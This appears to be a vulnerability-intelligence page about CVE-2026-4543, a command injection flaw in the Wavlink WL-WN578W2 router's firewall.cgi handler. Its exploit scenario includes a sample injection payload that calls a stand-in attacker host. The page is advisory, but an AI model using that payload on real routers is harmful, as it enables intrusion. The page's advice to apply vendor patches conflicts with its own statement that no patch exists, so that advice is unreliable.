Which versions of Wl Wn578w2 are affected by CVE-2026-4543?

Organizations using A vulnerability should be aware of moderate risk from CVE-2026-4543, a command injection vulnerability rated CVSS 6.3.

Is there a public PoC exploit available for CVE-2026-4543?

Yes, a public proof-of-concept exploit is available for CVE-2026-4543. Prioritise patching immediately. EPSS: 0.2%.

How to fix or mitigate CVE-2026-4543?

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Validate input sanitization for user-controlled parameters.

Wl Wn578w2 CVE-2026-4543

Q: What is the CVSS score of CVE-2026-4543?

CVE-2026-4543 has a CVSS 4.0 base score of 2.1 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.2%.

EUVD-2026-14295 LOW

Command Injection (CWE-77)

2026-03-22 VulDB

GHSA-xvp7-mx9h-8g48

Command Injection Wl Wn578w2

2.1

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.1 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Lifecycle Timeline

Severity Changed

Apr 29, 2026 - 01:11 NVD

MEDIUM LOW

CVSS changed

Apr 29, 2026 - 01:11 NVD

6.3 (MEDIUM) 2.1 (LOW)

PoC Detected

Mar 23, 2026 - 14:31 vuln.today

Public exploit code

EUVD ID Assigned

Mar 22, 2026 - 09:45 euvd

EUVD-2026-14295

Analysis Generated

Mar 22, 2026 - 09:45 vuln.today

CVE Published

Mar 22, 2026 - 09:23 nvd

MEDIUM 6.3

DescriptionCVE.org

A vulnerability was found in Wavlink WL-WN578W2 221110. The impacted element is an unknown function of the file /cgi-bin/firewall.cgi of the component POST Request Handler. Performing a manipulation of the argument dmz_flag/del_flag results in command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Wavlink WL-WN578W2 routers contain a command injection vulnerability in the /cgi-bin/firewall.cgi POST handler that allows authenticated attackers to execute arbitrary commands by manipulating the dmz_flag or del_flag parameters. The vulnerability is remotely exploitable and has public exploit code available, though no patch has been released. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L indicates network-accessible exploitation with low attack complexity but requiring prior authentication (PR:L), resulting in low confidentiality, integrity, and availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with a valid administrative credential (obtained through credential stuffing, phishing, or default credentials) authenticates to the router's web interface and submits a POST request to /cgi-bin/firewall.cgi with a malicious payload in the dmz_flag or del_flag parameter, such as 'on; telnet attacker.com 23', causing arbitrary shell commands to execute on the router. The attacker could then install a backdoor, redirect DNS traffic, launch man-in-the-middle attacks on network clients, or pivot to internal network resources. …
Remediation	No official firmware patch has been released from Wavlink. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. …

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-4543 vulnerability details – vuln.today

Back